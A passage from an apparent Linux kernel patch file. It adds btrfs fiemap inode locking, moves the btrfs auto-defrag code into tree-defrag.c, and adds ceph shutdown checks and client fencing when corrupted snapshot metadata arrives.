+ 	rcu_read_unlock();
+ 	spin_unlock(&mm->ioctx_lock);
+ 	return res;
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index acb3c5c3b0251..58785dc7080ad 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3938,6 +3938,7 @@ int extent_fiemap(struct btrfs_inode *inode, struct fiemap_extent_info *fieinfo,
+ 	lockend = round_up(start + len, root->fs_info->sectorsize);
+ 	prev_extent_end = lockstart;
+ 
++	btrfs_inode_lock(&inode->vfs_inode, BTRFS_ILOCK_SHARED);
+ 	lock_extent(&inode->io_tree, lockstart, lockend, &cached_state);
+ 
+ 	ret = fiemap_find_last_extent_offset(inode, path, &last_extent_end);
+@@ -4129,6 +4130,7 @@ check_eof_delalloc:
+ 
+ out_unlock:
+ 	unlock_extent(&inode->io_tree, lockstart, lockend, &cached_state);
++	btrfs_inode_unlock(&inode->vfs_inode, BTRFS_ILOCK_SHARED);
+ out:
+ 	kfree(backref_cache);
+ 	btrfs_free_path(path);
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 23056d9914d84..1bda59c683602 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -31,329 +31,6 @@
+ #include "reflink.h"
+ #include "subpage.h"
+ 
+-static struct kmem_cache *btrfs_inode_defrag_cachep;
+-/*
+- * when auto defrag is enabled we
+- * queue up these defrag structs to remember which
+- * inodes need defragging passes
+- */
+-struct inode_defrag {
+-	struct rb_node rb_node;
+-	/* objectid */
+-	u64 ino;
+-	/*
+-	 * transid where the defrag was added, we search for
+-	 * extents newer than this
+-	 */
+-	u64 transid;
+-
+-	/* root objectid */
+-	u64 root;
+-
+-	/*
+-	 * The extent size threshold for autodefrag.
+-	 *
+-	 * This value is different for compressed/non-compressed extents,
+-	 * thus needs to be passed from higher layer.
+-	 * (aka, inode_should_defrag())
+-	 */
+-	u32 extent_thresh;
+-};
+-
+-static int __compare_inode_defrag(struct inode_defrag *defrag1,
+-				  struct inode_defrag *defrag2)
+-{
+-	if (defrag1->root > defrag2->root)
+-		return 1;
+-	else if (defrag1->root < defrag2->root)
+-		return -1;
+-	else if (defrag1->ino > defrag2->ino)
+-		return 1;
+-	else if (defrag1->ino < defrag2->ino)
+-		return -1;
+-	else
+-		return 0;
+-}
+-
+-/* pop a record for an inode into the defrag tree.  The lock
+- * must be held already
+- *
+- * If you're inserting a record for an older transid than an
+- * existing record, the transid already in the tree is lowered
+- *
+- * If an existing record is found the defrag item you
+- * pass in is freed
+- */
+-static int __btrfs_add_inode_defrag(struct btrfs_inode *inode,
+-				    struct inode_defrag *defrag)
+-{
+-	struct btrfs_fs_info *fs_info = inode->root->fs_info;
+-	struct inode_defrag *entry;
+-	struct rb_node **p;
+-	struct rb_node *parent = NULL;
+-	int ret;
+-
+-	p = &fs_info->defrag_inodes.rb_node;
+-	while (*p) {
+-		parent = *p;
+-		entry = rb_entry(parent, struct inode_defrag, rb_node);
+-
+-		ret = __compare_inode_defrag(defrag, entry);
+-		if (ret < 0)
+-			p = &parent->rb_left;
+-		else if (ret > 0)
+-			p = &parent->rb_right;
+-		else {
+-			/* if we're reinserting an entry for
+-			 * an old defrag run, make sure to
+-			 * lower the transid of our existing record
+-			 */
+-			if (defrag->transid < entry->transid)
+-				entry->transid = defrag->transid;
+-			entry->extent_thresh = min(defrag->extent_thresh,
+-						   entry->extent_thresh);
+-			return -EEXIST;
+-		}
+-	}
+-	set_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags);
+-	rb_link_node(&defrag->rb_node, parent, p);
+-	rb_insert_color(&defrag->rb_node, &fs_info->defrag_inodes);
+-	return 0;
+-}
+-
+-static inline int __need_auto_defrag(struct btrfs_fs_info *fs_info)
+-{
+-	if (!btrfs_test_opt(fs_info, AUTO_DEFRAG))
+-		return 0;
+-
+-	if (btrfs_fs_closing(fs_info))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/*
+- * insert a defrag record for this inode if auto defrag is
+- * enabled
+- */
+-int btrfs_add_inode_defrag(struct btrfs_trans_handle *trans,
+-			   struct btrfs_inode *inode, u32 extent_thresh)
+-{
+-	struct btrfs_root *root = inode->root;
+-	struct btrfs_fs_info *fs_info = root->fs_info;
+-	struct inode_defrag *defrag;
+-	u64 transid;
+-	int ret;
+-
+-	if (!__need_auto_defrag(fs_info))
+-		return 0;
+-
+-	if (test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags))
+-		return 0;
+-
+-	if (trans)
+-		transid = trans->transid;
+-	else
+-		transid = inode->root->last_trans;
+-
+-	defrag = kmem_cache_zalloc(btrfs_inode_defrag_cachep, GFP_NOFS);
+-	if (!defrag)
+-		return -ENOMEM;
+-
+-	defrag->ino = btrfs_ino(inode);
+-	defrag->transid = transid;
+-	defrag->root = root->root_key.objectid;
+-	defrag->extent_thresh = extent_thresh;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	if (!test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags)) {
+-		/*
+-		 * If we set IN_DEFRAG flag and evict the inode from memory,
+-		 * and then re-read this inode, this new inode doesn't have
+-		 * IN_DEFRAG flag. At the case, we may find the existed defrag.
+-		 */
+-		ret = __btrfs_add_inode_defrag(inode, defrag);
+-		if (ret)
+-			kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	} else {
+-		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	}
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-	return 0;
+-}
+-
+-/*
+- * pick the defragable inode that we want, if it doesn't exist, we will get
+- * the next one.
+- */
+-static struct inode_defrag *
+-btrfs_pick_defrag_inode(struct btrfs_fs_info *fs_info, u64 root, u64 ino)
+-{
+-	struct inode_defrag *entry = NULL;
+-	struct inode_defrag tmp;
+-	struct rb_node *p;
+-	struct rb_node *parent = NULL;
+-	int ret;
+-
+-	tmp.ino = ino;
+-	tmp.root = root;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	p = fs_info->defrag_inodes.rb_node;
+-	while (p) {
+-		parent = p;
+-		entry = rb_entry(parent, struct inode_defrag, rb_node);
+-
+-		ret = __compare_inode_defrag(&tmp, entry);
+-		if (ret < 0)
+-			p = parent->rb_left;
+-		else if (ret > 0)
+-			p = parent->rb_right;
+-		else
+-			goto out;
+-	}
+-
+-	if (parent && __compare_inode_defrag(&tmp, entry) > 0) {
+-		parent = rb_next(parent);
+-		if (parent)
+-			entry = rb_entry(parent, struct inode_defrag, rb_node);
+-		else
+-			entry = NULL;
+-	}
+-out:
+-	if (entry)
+-		rb_erase(parent, &fs_info->defrag_inodes);
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-	return entry;
+-}
+-
+-void btrfs_cleanup_defrag_inodes(struct btrfs_fs_info *fs_info)
+-{
+-	struct inode_defrag *defrag;
+-	struct rb_node *node;
+-
+-	spin_lock(&fs_info->defrag_inodes_lock);
+-	node = rb_first(&fs_info->defrag_inodes);
+-	while (node) {
+-		rb_erase(node, &fs_info->defrag_inodes);
+-		defrag = rb_entry(node, struct inode_defrag, rb_node);
+-		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-
+-		cond_resched_lock(&fs_info->defrag_inodes_lock);
+-
+-		node = rb_first(&fs_info->defrag_inodes);
+-	}
+-	spin_unlock(&fs_info->defrag_inodes_lock);
+-}
+-
+-#define BTRFS_DEFRAG_BATCH	1024
+-
+-static int __btrfs_run_defrag_inode(struct btrfs_fs_info *fs_info,
+-				    struct inode_defrag *defrag)
+-{
+-	struct btrfs_root *inode_root;
+-	struct inode *inode;
+-	struct btrfs_ioctl_defrag_range_args range;
+-	int ret = 0;
+-	u64 cur = 0;
+-
+-again:
+-	if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
+-		goto cleanup;
+-	if (!__need_auto_defrag(fs_info))
+-		goto cleanup;
+-
+-	/* get the inode */
+-	inode_root = btrfs_get_fs_root(fs_info, defrag->root, true);
+-	if (IS_ERR(inode_root)) {
+-		ret = PTR_ERR(inode_root);
+-		goto cleanup;
+-	}
+-
+-	inode = btrfs_iget(fs_info->sb, defrag->ino, inode_root);
+-	btrfs_put_root(inode_root);
+-	if (IS_ERR(inode)) {
+-		ret = PTR_ERR(inode);
+-		goto cleanup;
+-	}
+-
+-	if (cur >= i_size_read(inode)) {
+-		iput(inode);
+-		goto cleanup;
+-	}
+-
+-	/* do a chunk of defrag */
+-	clear_bit(BTRFS_INODE_IN_DEFRAG, &BTRFS_I(inode)->runtime_flags);
+-	memset(&range, 0, sizeof(range));
+-	range.len = (u64)-1;
+-	range.start = cur;
+-	range.extent_thresh = defrag->extent_thresh;
+-
+-	sb_start_write(fs_info->sb);
+-	ret = btrfs_defrag_file(inode, NULL, &range, defrag->transid,
+-				       BTRFS_DEFRAG_BATCH);
+-	sb_end_write(fs_info->sb);
+-	iput(inode);
+-
+-	if (ret < 0)
+-		goto cleanup;
+-
+-	cur = max(cur + fs_info->sectorsize, range.start);
+-	goto again;
+-
+-cleanup:
+-	kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
+-	return ret;
+-}
+-
+-/*
+- * run through the list of inodes in the FS that need
+- * defragging
+- */
+-int btrfs_run_defrag_inodes(struct btrfs_fs_info *fs_info)
+-{
+-	struct inode_defrag *defrag;
+-	u64 first_ino = 0;
+-	u64 root_objectid = 0;
+-
+-	atomic_inc(&fs_info->defrag_running);
+-	while (1) {
+-		/* Pause the auto defragger. */
+-		if (test_bit(BTRFS_FS_STATE_REMOUNTING,
+-			     &fs_info->fs_state))
+-			break;
+-
+-		if (!__need_auto_defrag(fs_info))
+-			break;
+-
+-		/* find an inode to defrag */
+-		defrag = btrfs_pick_defrag_inode(fs_info, root_objectid,
+-						 first_ino);
+-		if (!defrag) {
+-			if (root_objectid || first_ino) {
+-				root_objectid = 0;
+-				first_ino = 0;
+-				continue;
+-			} else {
+-				break;
+-			}
+-		}
+-
+-		first_ino = defrag->ino + 1;
+-		root_objectid = defrag->root;
+-
+-		__btrfs_run_defrag_inode(fs_info, defrag);
+-	}
+-	atomic_dec(&fs_info->defrag_running);
+-
+-	/*
+-	 * during unmount, we use the transaction_wait queue to
+-	 * wait for the defragger to stop
+-	 */
+-	wake_up(&fs_info->transaction_wait);
+-	return 0;
+-}
+-
+ /* simple helper to fault in pages and copy.  This should go away
+  * and be replaced with calls into generic code.
+  */
+@@ -4130,23 +3807,6 @@ const struct file_operations btrfs_file_operations = {
+ 	.remap_file_range = btrfs_remap_file_range,
+ };
+ 
+-void __cold btrfs_auto_defrag_exit(void)
+-{
+-	kmem_cache_destroy(btrfs_inode_defrag_cachep);
+-}
+-
+-int __init btrfs_auto_defrag_init(void)
+-{
+-	btrfs_inode_defrag_cachep = kmem_cache_create("btrfs_inode_defrag",
+-					sizeof(struct inode_defrag), 0,
+-					SLAB_MEM_SPREAD,
+-					NULL);
+-	if (!btrfs_inode_defrag_cachep)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+ int btrfs_fdatawrite_range(struct inode *inode, loff_t start, loff_t end)
+ {
+ 	int ret;
+diff --git a/fs/btrfs/tree-defrag.c b/fs/btrfs/tree-defrag.c
+index 072ab9a1374b5..0520d6d32a2db 100644
+--- a/fs/btrfs/tree-defrag.c
++++ b/fs/btrfs/tree-defrag.c
+@@ -10,6 +10,326 @@
+ #include "transaction.h"
+ #include "locking.h"
+ 
++static struct kmem_cache *btrfs_inode_defrag_cachep;
++
++/*
++ * When auto defrag is enabled we queue up these defrag structs to remember
++ * which inodes need defragging passes.
++ */
++struct inode_defrag {
++	struct rb_node rb_node;
++	/* Inode number */
++	u64 ino;
++	/*
++	 * Transid where the defrag was added, we search for extents newer than
++	 * this.
++	 */
++	u64 transid;
++
++	/* Root objectid */
++	u64 root;
++
++	/*
++	 * The extent size threshold for autodefrag.
++	 *
++	 * This value is different for compressed/non-compressed extents, thus
++	 * needs to be passed from higher layer.
++	 * (aka, inode_should_defrag())
++	 */
++	u32 extent_thresh;
++};
++
++static int __compare_inode_defrag(struct inode_defrag *defrag1,
++				  struct inode_defrag *defrag2)
++{
++	if (defrag1->root > defrag2->root)
++		return 1;
++	else if (defrag1->root < defrag2->root)
++		return -1;
++	else if (defrag1->ino > defrag2->ino)
++		return 1;
++	else if (defrag1->ino < defrag2->ino)
++		return -1;
++	else
++		return 0;
++}
++
++/*
++ * Insert a record for an inode into the defrag tree.  The lock must be held
++ * already.
++ *
++ * If you're inserting a record for an older transid than an existing record,
++ * the transid already in the tree is lowered.
++ *
++ * If an existing record is found the defrag item you pass in is freed.
++ */
++static int __btrfs_add_inode_defrag(struct btrfs_inode *inode,
++				    struct inode_defrag *defrag)
++{
++	struct btrfs_fs_info *fs_info = inode->root->fs_info;
++	struct inode_defrag *entry;
++	struct rb_node **p;
++	struct rb_node *parent = NULL;
++	int ret;
++
++	p = &fs_info->defrag_inodes.rb_node;
++	while (*p) {
++		parent = *p;
++		entry = rb_entry(parent, struct inode_defrag, rb_node);
++
++		ret = __compare_inode_defrag(defrag, entry);
++		if (ret < 0)
++			p = &parent->rb_left;
++		else if (ret > 0)
++			p = &parent->rb_right;
++		else {
++			/*
++			 * If we're reinserting an entry for an old defrag run,
++			 * make sure to lower the transid of our existing
++			 * record.
++			 */
++			if (defrag->transid < entry->transid)
++				entry->transid = defrag->transid;
++			entry->extent_thresh = min(defrag->extent_thresh,
++						   entry->extent_thresh);
++			return -EEXIST;
++		}
++	}
++	set_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags);
++	rb_link_node(&defrag->rb_node, parent, p);
++	rb_insert_color(&defrag->rb_node, &fs_info->defrag_inodes);
++	return 0;
++}
++
++static inline int __need_auto_defrag(struct btrfs_fs_info *fs_info)
++{
++	if (!btrfs_test_opt(fs_info, AUTO_DEFRAG))
++		return 0;
++
++	if (btrfs_fs_closing(fs_info))
++		return 0;
++
++	return 1;
++}
++
++/*
++ * Insert a defrag record for this inode if auto defrag is enabled.
++ */
++int btrfs_add_inode_defrag(struct btrfs_trans_handle *trans,
++			   struct btrfs_inode *inode, u32 extent_thresh)
++{
++	struct btrfs_root *root = inode->root;
++	struct btrfs_fs_info *fs_info = root->fs_info;
++	struct inode_defrag *defrag;
++	u64 transid;
++	int ret;
++
++	if (!__need_auto_defrag(fs_info))
++		return 0;
++
++	if (test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags))
++		return 0;
++
++	if (trans)
++		transid = trans->transid;
++	else
++		transid = inode->root->last_trans;
++
++	defrag = kmem_cache_zalloc(btrfs_inode_defrag_cachep, GFP_NOFS);
++	if (!defrag)
++		return -ENOMEM;
++
++	defrag->ino = btrfs_ino(inode);
++	defrag->transid = transid;
++	defrag->root = root->root_key.objectid;
++	defrag->extent_thresh = extent_thresh;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	if (!test_bit(BTRFS_INODE_IN_DEFRAG, &inode->runtime_flags)) {
++		/*
++		 * If we set the IN_DEFRAG flag and evict the inode from memory,
++		 * and then re-read this inode, the new inode doesn't have the
++		 * IN_DEFRAG flag set. In that case, we may find an existing defrag.
++		 */
++		ret = __btrfs_add_inode_defrag(inode, defrag);
++		if (ret)
++			kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	} else {
++		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	}
++	spin_unlock(&fs_info->defrag_inodes_lock);
++	return 0;
++}
++
++/*
++ * Pick the defraggable inode that we want; if it doesn't exist, we will
++ * get the next one.
++ */
++static struct inode_defrag *btrfs_pick_defrag_inode(
++			struct btrfs_fs_info *fs_info, u64 root, u64 ino)
++{
++	struct inode_defrag *entry = NULL;
++	struct inode_defrag tmp;
++	struct rb_node *p;
++	struct rb_node *parent = NULL;
++	int ret;
++
++	tmp.ino = ino;
++	tmp.root = root;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	p = fs_info->defrag_inodes.rb_node;
++	while (p) {
++		parent = p;
++		entry = rb_entry(parent, struct inode_defrag, rb_node);
++
++		ret = __compare_inode_defrag(&tmp, entry);
++		if (ret < 0)
++			p = parent->rb_left;
++		else if (ret > 0)
++			p = parent->rb_right;
++		else
++			goto out;
++	}
++
++	if (parent && __compare_inode_defrag(&tmp, entry) > 0) {
++		parent = rb_next(parent);
++		if (parent)
++			entry = rb_entry(parent, struct inode_defrag, rb_node);
++		else
++			entry = NULL;
++	}
++out:
++	if (entry)
++		rb_erase(parent, &fs_info->defrag_inodes);
++	spin_unlock(&fs_info->defrag_inodes_lock);
++	return entry;
++}
++
++void btrfs_cleanup_defrag_inodes(struct btrfs_fs_info *fs_info)
++{
++	struct inode_defrag *defrag;
++	struct rb_node *node;
++
++	spin_lock(&fs_info->defrag_inodes_lock);
++	node = rb_first(&fs_info->defrag_inodes);
++	while (node) {
++		rb_erase(node, &fs_info->defrag_inodes);
++		defrag = rb_entry(node, struct inode_defrag, rb_node);
++		kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++
++		cond_resched_lock(&fs_info->defrag_inodes_lock);
++
++		node = rb_first(&fs_info->defrag_inodes);
++	}
++	spin_unlock(&fs_info->defrag_inodes_lock);
++}
++
++#define BTRFS_DEFRAG_BATCH	1024
++
++static int __btrfs_run_defrag_inode(struct btrfs_fs_info *fs_info,
++				    struct inode_defrag *defrag)
++{
++	struct btrfs_root *inode_root;
++	struct inode *inode;
++	struct btrfs_ioctl_defrag_range_args range;
++	int ret = 0;
++	u64 cur = 0;
++
++again:
++	if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
++		goto cleanup;
++	if (!__need_auto_defrag(fs_info))
++		goto cleanup;
++
++	/* Get the inode */
++	inode_root = btrfs_get_fs_root(fs_info, defrag->root, true);
++	if (IS_ERR(inode_root)) {
++		ret = PTR_ERR(inode_root);
++		goto cleanup;
++	}
++
++	inode = btrfs_iget(fs_info->sb, defrag->ino, inode_root);
++	btrfs_put_root(inode_root);
++	if (IS_ERR(inode)) {
++		ret = PTR_ERR(inode);
++		goto cleanup;
++	}
++
++	if (cur >= i_size_read(inode)) {
++		iput(inode);
++		goto cleanup;
++	}
++
++	/* Do a chunk of defrag */
++	clear_bit(BTRFS_INODE_IN_DEFRAG, &BTRFS_I(inode)->runtime_flags);
++	memset(&range, 0, sizeof(range));
++	range.len = (u64)-1;
++	range.start = cur;
++	range.extent_thresh = defrag->extent_thresh;
++
++	sb_start_write(fs_info->sb);
++	ret = btrfs_defrag_file(inode, NULL, &range, defrag->transid,
++				       BTRFS_DEFRAG_BATCH);
++	sb_end_write(fs_info->sb);
++	iput(inode);
++
++	if (ret < 0)
++		goto cleanup;
++
++	cur = max(cur + fs_info->sectorsize, range.start);
++	goto again;
++
++cleanup:
++	kmem_cache_free(btrfs_inode_defrag_cachep, defrag);
++	return ret;
++}
++
++/*
++ * Run through the list of inodes in the FS that need defragging.
++ */
++int btrfs_run_defrag_inodes(struct btrfs_fs_info *fs_info)
++{
++	struct inode_defrag *defrag;
++	u64 first_ino = 0;
++	u64 root_objectid = 0;
++
++	atomic_inc(&fs_info->defrag_running);
++	while (1) {
++		/* Pause the auto defragger. */
++		if (test_bit(BTRFS_FS_STATE_REMOUNTING, &fs_info->fs_state))
++			break;
++
++		if (!__need_auto_defrag(fs_info))
++			break;
++
++		/* Find an inode to defrag */
++		defrag = btrfs_pick_defrag_inode(fs_info, root_objectid, first_ino);
++		if (!defrag) {
++			if (root_objectid || first_ino) {
++				root_objectid = 0;
++				first_ino = 0;
++				continue;
++			} else {
++				break;
++			}
++		}
++
++		first_ino = defrag->ino + 1;
++		root_objectid = defrag->root;
++
++		__btrfs_run_defrag_inode(fs_info, defrag);
++	}
++	atomic_dec(&fs_info->defrag_running);
++
++	/*
++	 * During unmount, we use the transaction_wait queue to wait for the
++	 * defragger to stop.
++	 */
++	wake_up(&fs_info->transaction_wait);
++	return 0;
++}
++
+ /*
+  * Defrag all the leaves in a given btree.
+  * Read all the leaves and try to get key order to
+@@ -132,3 +452,20 @@ done:
+ 
+ 	return ret;
+ }
++
++void __cold btrfs_auto_defrag_exit(void)
++{
++	kmem_cache_destroy(btrfs_inode_defrag_cachep);
++}
++
++int __init btrfs_auto_defrag_init(void)
++{
++	btrfs_inode_defrag_cachep = kmem_cache_create("btrfs_inode_defrag",
++					sizeof(struct inode_defrag), 0,
++					SLAB_MEM_SPREAD,
++					NULL);
++	if (!btrfs_inode_defrag_cachep)
++		return -ENOMEM;
++
++	return 0;
++}
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index 61f47debec5ac..478c03bfba663 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -305,7 +305,7 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	struct inode *inode = rreq->inode;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_fs_client *fsc = ceph_inode_to_client(inode);
+-	struct ceph_osd_request *req;
++	struct ceph_osd_request *req = NULL;
+ 	struct ceph_vino vino = ceph_vino(inode);
+ 	struct iov_iter iter;
+ 	struct page **pages;
+@@ -313,6 +313,11 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	int err = 0;
+ 	u64 len = subreq->len;
+ 
++	if (ceph_inode_is_shutdown(inode)) {
++		err = -EIO;
++		goto out;
++	}
++
+ 	if (ceph_has_inline_data(ci) && ceph_netfs_issue_op_inline(subreq))
+ 		return;
+ 
+@@ -563,6 +568,9 @@ static int writepage_nounlock(struct page *page, struct writeback_control *wbc)
+ 
+ 	dout("writepage %p idx %lu\n", page, page->index);
+ 
++	if (ceph_inode_is_shutdown(inode))
++		return -EIO;
++
+ 	/* verify this is a writeable snap context */
+ 	snapc = page_snap_context(page);
+ 	if (!snapc) {
+@@ -1643,7 +1651,7 @@ int ceph_uninline_data(struct file *file)
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_fs_client *fsc = ceph_inode_to_client(inode);
+ 	struct ceph_osd_request *req = NULL;
+-	struct ceph_cap_flush *prealloc_cf;
++	struct ceph_cap_flush *prealloc_cf = NULL;
+ 	struct folio *folio = NULL;
+ 	u64 inline_version = CEPH_INLINE_NONE;
+ 	struct page *pages[1];
+@@ -1657,6 +1665,11 @@ int ceph_uninline_data(struct file *file)
+ 	dout("uninline_data %p %llx.%llx inline_version %llu\n",
+ 	     inode, ceph_vinop(inode), inline_version);
+ 
++	if (ceph_inode_is_shutdown(inode)) {
++		err = -EIO;
++		goto out;
++	}
++
+ 	if (inline_version == CEPH_INLINE_NONE)
+ 		return 0;
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index cd69bf267d1b1..795fd6d84bde0 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4081,6 +4081,7 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 	void *p, *end;
+ 	struct cap_extra_info extra_info = {};
+ 	bool queue_trunc;
++	bool close_sessions = false;
+ 
+ 	dout("handle_caps from mds%d\n", session->s_mds);
+ 
+@@ -4218,9 +4219,13 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 		realm = NULL;
+ 		if (snaptrace_len) {
+ 			down_write(&mdsc->snap_rwsem);
+-			ceph_update_snap_trace(mdsc, snaptrace,
+-					       snaptrace + snaptrace_len,
+-					       false, &realm);
++			if (ceph_update_snap_trace(mdsc, snaptrace,
++						   snaptrace + snaptrace_len,
++						   false, &realm)) {
++				up_write(&mdsc->snap_rwsem);
++				close_sessions = true;
++				goto done;
++			}
+ 			downgrade_write(&mdsc->snap_rwsem);
+ 		} else {
+ 			down_read(&mdsc->snap_rwsem);
+@@ -4280,6 +4285,11 @@ done_unlocked:
+ 	iput(inode);
+ out:
+ 	ceph_put_string(extra_info.pool_ns);
++
++	/* Defer closing the sessions until after the s_mutex lock is released */
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
++
+ 	return;
+ 
+ flush_cap_releases:
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 6f9580defb2b3..5895797f3104a 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2004,6 +2004,9 @@ static int ceph_zero_partial_object(struct inode *inode,
+ 	loff_t zero = 0;
+ 	int op;
+ 
++	if (ceph_inode_is_shutdown(inode))
++		return -EIO;
++
+ 	if (!length) {
+ 		op = offset ? CEPH_OSD_OP_DELETE : CEPH_OSD_OP_TRUNCATE;
+ 		length = &zero;
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 756560df3bdbd..27a245d959c0a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -806,6 +806,9 @@ static struct ceph_mds_session *register_session(struct ceph_mds_client *mdsc,
+ {
+ 	struct ceph_mds_session *s;
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO)
++		return ERR_PTR(-EIO);
++
+ 	if (mds >= mdsc->mdsmap->possible_max_rank)
+ 		return ERR_PTR(-EINVAL);
+ 
+@@ -1478,6 +1481,9 @@ static int __open_session(struct ceph_mds_client *mdsc,
+ 	int mstate;
+ 	int mds = session->s_mds;
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO)
++		return -EIO;
++
+ 	/* wait for mds to go active? */
+ 	mstate = ceph_mdsmap_get_state(mdsc->mdsmap, mds);
+ 	dout("open_session to mds%d (%s)\n", mds,
+@@ -2860,6 +2866,11 @@ static void __do_request(struct ceph_mds_client *mdsc,
+ 		return;
+ 	}
+ 
++	if (READ_ONCE(mdsc->fsc->mount_state) == CEPH_MOUNT_FENCE_IO) {
++		dout("do_request metadata corrupted\n");
++		err = -EIO;
++		goto finish;
++	}
+ 	if (req->r_timeout &&
+ 	    time_after_eq(jiffies, req->r_started + req->r_timeout)) {
+ 		dout("do_request timed out\n");
+@@ -3245,6 +3256,7 @@ static void handle_reply(struct ceph_mds_session *session, struct ceph_msg *msg)
+ 	u64 tid;
+ 	int err, result;
+ 	int mds = session->s_mds;
++	bool close_sessions = false;
+ 
+ 	if (msg->front.iov_len < sizeof(*head)) {
+ 		pr_err("mdsc_handle_reply got corrupt (short) reply\n");
+@@ -3351,10 +3363,17 @@ static void handle_reply(struct ceph_mds_session *session, struct ceph_msg *msg)
+ 	realm = NULL;
+ 	if (rinfo->snapblob_len) {
+ 		down_write(&mdsc->snap_rwsem);
+-		ceph_update_snap_trace(mdsc, rinfo->snapblob,
++		err = ceph_update_snap_trace(mdsc, rinfo->snapblob,
+ 				rinfo->snapblob + rinfo->snapblob_len,
+ 				le32_to_cpu(head->op) == CEPH_MDS_OP_RMSNAP,
+ 				&realm);
++		if (err) {
++			up_write(&mdsc->snap_rwsem);
++			close_sessions = true;
++			if (err == -EIO)
++				ceph_msg_dump(msg);
++			goto out_err;
++		}
+ 		downgrade_write(&mdsc->snap_rwsem);
+ 	} else {
+ 		down_read(&mdsc->snap_rwsem);
+@@ -3412,6 +3431,10 @@ out_err:
+ 				     req->r_end_latency, err);
+ out:
+ 	ceph_mdsc_put_request(req);
++
++	/* Defer closing the sessions until after the s_mutex lock is released */
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+ }
+ 
+@@ -5017,7 +5040,7 @@ static bool done_closing_sessions(struct ceph_mds_client *mdsc, int skipped)
+ }
+ 
+ /*
+- * called after sb is ro.
++ * called after sb is ro or when metadata is corrupted.
+  */
+ void ceph_mdsc_close_sessions(struct ceph_mds_client *mdsc)
+ {
+@@ -5307,7 +5330,8 @@ static void mds_peer_reset(struct ceph_connection *con)
+ 	struct ceph_mds_client *mdsc = s->s_mdsc;
+ 
+ 	pr_warn("mds%d closed our session\n", s->s_mds);
+-	send_mds_reconnect(mdsc, s);
++	if (READ_ONCE(mdsc->fsc->mount_state) != CEPH_MOUNT_FENCE_IO)
++		send_mds_reconnect(mdsc, s);
+ }
+ 
+ static void mds_dispatch(struct ceph_connection *con, struct ceph_msg *msg)
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index e4151852184e0..87007203f130e 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/ceph/ceph_debug.h>
+ 
++#include <linux/fs.h>
+ #include <linux/sort.h>
+ #include <linux/slab.h>
+ #include <linux/iversion.h>
+@@ -766,8 +767,10 @@ int ceph_update_snap_trace(struct ceph_mds_client *mdsc,
+ 	struct ceph_snap_realm *realm;
+ 	struct ceph_snap_realm *first_realm = NULL;
+ 	struct ceph_snap_realm *realm_to_rebuild = NULL;
++	struct ceph_client *client = mdsc->fsc->client;
+ 	int rebuild_snapcs;
+ 	int err = -ENOMEM;
++	int ret;
+ 	LIST_HEAD(dirty_realms);
+ 
+ 	lockdep_assert_held_write(&mdsc->snap_rwsem);
+@@ -884,6 +887,27 @@ fail:
+ 	if (first_realm)
+ 		ceph_put_snap_realm(mdsc, first_realm);
+ 	pr_err("%s error %d\n", __func__, err);
++
++	/*
++	 * When receiving a corrupted snap trace we don't know what
++	 * exactly has happened on the MDS side, and we shouldn't keep
++	 * writing to the OSDs, which may corrupt the snapshot contents.
++	 *
++	 * Just try to blocklist this kclient; the client must then be
++	 * remounted to continue once the corrupted metadata has been
++	 * fixed on the MDS side.
++	 */
++	WRITE_ONCE(mdsc->fsc->mount_state, CEPH_MOUNT_FENCE_IO);
++	ret = ceph_monc_blocklist_add(&client->monc, &client->msgr.inst.addr);
++	if (ret)
